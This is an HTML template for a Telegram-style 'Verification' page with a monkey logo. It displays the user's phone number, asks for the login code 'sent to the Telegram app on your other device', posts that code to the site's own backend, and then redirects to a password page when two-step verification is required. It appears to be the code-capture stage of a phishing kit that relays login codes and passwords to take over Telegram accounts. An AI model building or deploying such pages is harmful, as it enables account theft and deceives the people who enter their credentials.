<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verification</title>
    <style>
        .telegram-logo {
            color: white;
            background-color: #cccccc;
            padding: 10px;
            border-radius: 5px;
        }
        .monkey-logo {
            color: white;
            background-color: #cccccc;
            padding: 10px;
            border-radius: 5px;
        }
    </style>
    <link rel="stylesheet" href="/static/css/styles.css">
</head>
<body>
    <div class="login-container">
        <div class="monkey-logo">
            <img src="/static/img/monkey.png" alt="Monkey Logo">
            <h1>{{ phone }}</h1>
            <p>We've sent the code to the Telegram app on your other device</p>
        </div>
        <form id="verification-form" class="verification-form">
            <div class="code-input">
                <label for="code">Enter the code:</label>
                <input type="text" id="code" name="code" placeholder="Enter the code" required>
            </div>
            <button type="submit">Login</button>
        </form>
    </div>
    <script>
        document.addEventListener('DOMContentLoaded', function() {
            console.log('DOM fully loaded and parsed');
            document.getElementById('verification-form').addEventListener('submit', function(event) {
                event.preventDefault(); // Предотвращаем стандартное поведение формы
                var verificationCode = document.getElementById('code').value;
                console.log('Verification code entered: ' + verificationCode);
                fetch('/submit_code', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ code: verificationCode })
                })
                .then(response => response.json())
                .then(data => {
                    console.log(data);
                    if (data.status === 'password_required') {
                        window.location.href = '/password_page';
                    }
                })
                .catch(error => console.error('Error:', error));
            });
        });
    </script>
</body>
</html>
